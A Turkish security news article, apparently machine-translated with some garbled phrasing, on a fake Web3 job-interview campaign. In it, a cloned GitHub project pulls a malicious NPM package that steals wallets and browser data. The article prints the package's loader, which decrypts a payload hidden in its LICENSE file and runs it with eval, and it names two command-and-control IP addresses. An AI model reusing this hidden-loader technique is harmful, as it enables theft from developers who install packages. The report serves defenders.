Güvenlik Araştırmacıları, Ukraynalı bir Web3 geliştirme ekibi olarak gizlenen sofistike bir siber suç operasyonu, silahlandırılmış NPM paketleri aracılığıyla iş arayanları hedefliyor.
Saldırı, şüpheli olmayan adayları kripto para birimi cüzdanları, tarayıcı verileri ve hassas kişisel bilgileri çalan kötü amaçlı kodları indirmeye ve yürütmeye yönlendirmek için sahte görüşme süreçlerinden yararlanır.
Kampanya, ilk tur görüşmeleri sırasında saldırganların potansiyel çalışanlara sunduğu “tahliye topluluğu/ultrax” adlı meşru bir GitHub deposunun etrafında yer alıyor.
Mağdurlara depoyu yerel olarak teknik değerlendirmenin bir parçası olarak klonlamaları ve işletmeleri talimatı verilir. Bununla birlikte, proje hedefin sisteminden hassas verileri toplamak için tasarlanmış kötü niyetli bir NPM bağımlılığı içerir.
9 Ağustos 2025’te bir topluluk üyesi, bir görüşme sürecinde deponun içeriğinden şüphelendikten sonra Slowmist araştırmacılarına yaklaştı.
Güvenlik ekibinin müteakip analizi, projenin bağımlılıklarına gömülü bir arka kapağın varlığını ortaya çıkardı ve standart bir Web3 geliştirme deposu gibi görünen şeyin kötü niyetli doğasını doğruladı.
Slowmist analistleri, saldırının başlangıçta NPM paketini kullandığını belirledi ”[email protected]”Bu daha sonra yerini aldı[email protected]“Orijinal paket NPM’nin güvenlik ekibi tarafından kaldırıldıktan sonra.
8 Ağustos 2025’te yayınlanan daha yeni paket, aynı kötü niyetli işlevselliği korurken algılamadan kaçınmak için tasarlanmış çok gizli kod içeriyor.
Tehdit, bireysel kurbanların ötesine uzanıyor, çünkü araştırmacılar iki ek GitHub hesabının kötü niyetli depoyu çatalladığını keşfetti ve bu da Web3 iş piyasasında birden fazla potansiyel kurbanı hedefleyen daha geniş bir kampanya olduğunu gösteriyor.
Enfeksiyon mekanizması ve kod yürütme
Kötü amaçlı yazılımların enfeksiyon vektörü, teknik sömürü yerine sosyal mühendisliğe dayanır, bu da rekabetçi Web3 alanındaki iş arayanlar için özellikle tehlikeli hale getirir.
Kurban depoyu klonladıktan ve “NPM kurulumu” gerçekleştirdikten sonra, kötü niyetli RTK-logger paketi, yükünü otomatik olarak sofistike bir çok aşamalı işlemle tetikler.
.webp)
Paketin temel kötü amaçlı kodu, lisans dosyasında depolanan gizlenmiş yüklerin kilidini açmak için AES-256-CBC şifre çözme kullanan “/rtk-logger/lib/utils/smtp-connection/index.js” de bulunur.
Şifre çözme işlemi, karma kodlanmış anahtarlar ve başlatma vektörleri kullanır ve kötü amaçlı yazılımın ilk dağıtım sırasında ek ağ iletişimi olmadan yürütülmesine izin verir.
const fs = require('fs');
const path = require('path');
const parseLib = require('./parse')
const filePath = path.join(__dirname, 'LICENSE');
fs.readFile(filePath, 'utf8', (_, data) => {
try {
eval(parseLib(data))
} catch (err) {
console.error('Error during parsing/eval:', err);
}
})Başarılı bir şifre çözme işleminden sonra, kötü amaçlı yazılım, çeşitli sistem düzeyinde değişiklikler yoluyla kalıcılığı korurken uzaktan erişim ve veri söndürme özelliklerini sağlayan 144.172.112.106 ve 172.86.64.67 numaralı telefondan komut ve kontrol sunucularına bağlantılar kurar.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.